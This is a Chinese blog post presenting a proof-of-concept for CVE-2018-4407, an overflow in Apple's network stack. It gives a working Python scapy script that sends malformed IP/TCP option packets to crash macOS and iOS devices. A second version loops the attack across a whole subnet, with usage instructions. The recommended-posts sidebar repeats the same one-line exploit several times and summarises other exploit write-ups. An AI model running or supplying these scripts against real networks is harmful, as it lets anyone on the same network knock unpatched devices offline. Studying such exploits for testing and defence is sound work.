CVE-2018-4407 POC

最新推荐文章于 2025-07-09 09:34:05 发布
原创 最新推荐文章于 2025-07-09 09:34:05 发布 · 336 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全 #cve

本文详细解析了CVE-2018-4407的安全漏洞,提供了利用该漏洞进行ICMP DoS攻击的Python脚本示例,展示了如何通过循环发送特定构造的ICMP数据包来触发目标主机的资源耗尽,导致拒绝服务。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CVE-2018-4407 POC

import sys
try:
    from scapy.all import *
except Exception as e:
    print ("[*] You need install scapy first:\n[*] sudo pip install scapy ")
if __name__ == '__main__':
    try:
        check_ip = sys.argv[1]
        print ("[*] !!!!!!Dangerous operation!!!!!!")
        print ("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip)
        for i in range(8,20):
            send(IP(dst=check_ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
        print ("[*] Check Over!! ")
    except Exception as e:
        print "[*] usage: sudo python CVE-2018-4407.py 127.0.0.1"

使用循环实现指定IP范围内所有设备的检查

import sys
ip_ori = sys.argv[1]
ip_start = sys.argv[2]
ip_end = sys.argv[3]
from scapy.all import *
for i in range(int(ip_start),int(ip_end)):
	ip = ip_ori+"."+str(i)
	# print (ip)
	print ("Trying CVE-2018-4407 ICMP DOS "+ip)
	for i in range(8,20):
		send(IP(dst=ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
	print ("[*] Check Over!! ")
	pass
使用方法

sudo python 4407.py 192.168.100 101 152
使用脚本批量检测 192.168.100网段 102-152的IP

CVE-POC:CVE的一些POC
05-11
CVE-POC CNVD-2021-10543 MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞 CVE-2020-1938 Apache Tomcat文件包含漏洞
CVE-2018-4407 漏洞复现POC
weixin_30608131的博客
11-01 286
pip install scapy    import scapy from scapy.all import * send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))    转载于:https:...
紧急预警!Git 高危漏洞PoC 完整复现流程曝光!漏洞 POC 深度解析:从代码到攻击链的完整拆解
最新发布
athink_cn的博客
07-09 2218
GitHub发布高危漏洞预警(CVE-2025-48384),该Git符号链接执行漏洞CVSS评分为8.0,已发现可远程利用的PoC。攻击者可通过构造含回车符(CR)的子模块路径,利用Git配置写入缺陷导致路径解析错误,配合符号链接将恶意脚本指向钩子目录。当受害者克隆仓库并初始化子模块时,会自动触发post-checkout钩子执行任意代码。漏洞利用门槛低,PoC显示仅需一个回车符即可完成"克隆即RCE"的完整攻击链,目前已出现多个公开验证代码,建议立即升级防护。
CVE-2018-4407 苹果设备远程溢出漏洞
十年磨一剑,霜刃未曾试!
12-31 712
2018-10-30 公开了一个 Apple 设备的远程代码执行漏洞 CVE-2018-4407,该漏洞是收到畸形数据包后,向发送方报告错误,在构造 ICMP 数据包时发生了溢出,影响 macOS 10.13.6 及以下版本,iOS 11 及以下版本 python exp,能够造成让系统崩溃,代码如下: # CVE-2018-4407 ICMP DOS # https://lgtm.com/...
CVE-2018-4407缓冲区溢出
Jiajiajiang_的博客
11-16 643
此漏洞使得攻击者只要接入同一WIFI网络,即可向其他毫不知情的用户发送恶意数据包来触发Mac或IOS设备的崩溃和重启。由于该漏洞存在于系统网络核心代码,因此任何反病毒软件均无法防御。 易受攻击的设备: Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备) Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新20...
CVE-2018-4407(IOS缓冲区溢出漏洞)exp
weixin_30814223的博客
03-09 318
CVE-2018-4407为ios缓冲区溢出漏洞 exp: import scapyfrom scapy.all import * send(IP(dst="同一局域网内目标Ip",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)])) 漏洞范围: 运行以下操作系统的设...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对...
CVE-2018-17182:Linux内核VMA-UAF提权突破(CVE-2018-17182),0天
03-20
CVE-2018-17182 Linux内核VMA-UAF提权突破(CVE-2018-17182) 关于 Google Project Zero的网络安全研究人员发布了详细信息,并针对自内核版本3.16至4.18.8以来Linux内核中存在的高严重性漏洞的概念验证(PoC)漏洞...
CVE-2018-2893:CVE-2018-2893 PoC
04-30
CVE-2018-2893 步骤1 java -jar ysoserial-cve-2018-2893.jar WHY SO SERIAL? Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]' Available payload types: Payload Authors Dependencies --...
CVE-2018-1000006-DEMO:CVE-2018-1000006的演示
04-26
CVE-2018-1000006-DEMO The Demo for CVE-2018-1000006 Analysis POC 可以直接使用 elec_rce\elec_rce-win32-x64\elec_rce.exe 也可以自己打包成exe应用,生成有漏洞的版本应用,以版本1.7.8为例: electron-packager...
OpenSSH用户枚举漏洞pocCVE-2018-15473)
08-24
OpenSSH用户枚举漏洞pocCVE-2018-15473),通过poc可以直接检查目标服务器是否存在此漏洞,通过检查漏洞,来及早发现漏洞,打上补丁
CVE-Exploits:PoC利用软件漏洞
03-10
CVE漏洞利用PoC PoC利用多个软件漏洞。 当前的漏洞利用 CVE-2019-18634 :启用pwfeedback模块时,sudo tgetpass.c中基于堆栈的缓冲区溢出 CVE-2021-3156 :当argv以反斜杠字符结尾时,sudo sudoers.c中基于堆的缓冲区溢出。 jad OOB写入:JAD越界写入导致代码执行(尚未提供CVECVE-2019-15846 :4.92.2远程执行代码之前的Exim QBot身份验证绕过:通过BSS缓冲区溢出的QBot面板身份验证绕过
cve-2018-20250 WinRAR代码执行漏洞演示
02-28
此视频是对与WinRAR 代码执行漏洞的演示视频,因为原漏洞发布厂商并没有发布对应的poc,和演示视频,特录制了视频方便大家观看效果,里面还附带了大家最想要的poc ,希望对大家有帮助
CVE-2016-0165 分析&利用POC
qq_41252520的博客
07-08 749
1.3.危害等级 7.8 | 高危这是未打补丁和打过补丁之后的RGNMEMOBJ::vCreate\textcolor{orange}{RGNMEMOBJ::vCreate}RGNMEMOBJ::vCreate函数对比图有点像找不同 ,发现主要有6处不同。这是在分配缓冲区之前增加的两个函数看到ULongAdd\textcolor{cornflowerblue}{ULongAdd}ULongAdd和ULongLongToULong\textcolor{cornflowerblue}{ULongLongToUL
CVE-2024-38819:Spring 框架路径遍历 PoC 漏洞复现
qq_73861475的博客
12-16 4230
注意在创建的时候有些镜像无法拉取到,可以在Dockerfile文件中修改配置使用其他的镜像。: 通过创建符号链接,攻击者可以尝试构造一个路径遍历的恶意 URL。该漏洞利用了路径遍历问题,使攻击者能够访问系统中本不应暴露的文件(如。攻击者能够进一步利用该信息来获取其他敏感数据或执行任意代码。这段代码创建了一个静态文件资源的路由。目录“跳出”并访问系统的其他目录(如。来尝试获取指向其他系统路径的文件。拿到环境的源码使用docker搭建。文件的内容,证明存在该漏洞。),从而获取系统敏感信息。
Windows 零日漏洞遭利用:CVE-2024-49138 PoC 代码发布,从零基础到精通,收藏这篇就够了!
Python_0011的博客
01-22 1591
更为紧迫的是,安全研究员 MrAle_98在 GitHub 上发布了针对 CVE-2024-49138 的概念验证 (PoC) 漏洞。根据微软的公告,此漏洞影响了广泛的 Windows 系统。虽然关于该漏洞的具体细节很少,但微软证实,在补丁发布之前,该漏洞已被广泛利用。尽管微软尚未披露利用 CVE-2024-49138 的攻击的具体细节,但一家领先安全公司的参与表明,详细的利用报告可能会很快发布。这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」
BlueBorne远程代码执行漏洞Poc实战(CVE-2017-0781)
小蓝人敌法的专栏
12-12 3354
BlueBorne远程代码执行漏洞Poc实战(CVE-2017-0781) 前几天,一个名为Armis的公司发布了Android设备上的一个蓝牙远程代码执行漏洞(CVE-2017-0781)的Poc,漏洞命名为BlueBorne,尽管BlueBorne漏洞涉及到了8个漏洞点,但是这个Poc只用了其中的2个就达到了利用的目的。 整个利用过程分为2个阶段,Poc先是使用了内存泄露漏洞(CVE-2017-
ie浏览器修复_警惕:IE远程命令执行漏洞 (CVE20200674) POC已公布
weixin_39986435的博客
11-14 416
该漏洞此前曾被在野利用,影响IE 9-11浏览器。微软在2月发布例行补丁修复该漏洞。通告概要2020年1月17日,在微软的每月的例行补丁日两天之后,发布了编号为ADV200001的例行外安全公告,该公告的披露涉及一个野外发现的0day漏洞CVE-2020-0674,被用于执行小范围针对性的攻击。目前还未有相应的针对此漏洞的补丁,微软方面正在积极修复,已在2月的例行补丁包中修复此漏洞。奇安...
CVE-2020-0729 poc构造记录
r250414958的博客
03-26 774
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 CVE-2020-0729 poc构造记录前言环境构造过程后续参考 前言 提由于想找个样本 研究一下,网上搜索了一番并没有现成的样本,于是打算自己尝试构造一个试试 环境 windows 10 构造过程 先用这个方法构造一个正常的样本 根据已知的漏洞函数我们对其进行分析触发流程 函数首先读取2字节类型,并检查是否已设置VT_ARRAY(0x2000) 然后 该函数检查类型是否为VT_UI4(0x0013),如果不是,则输入swi.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值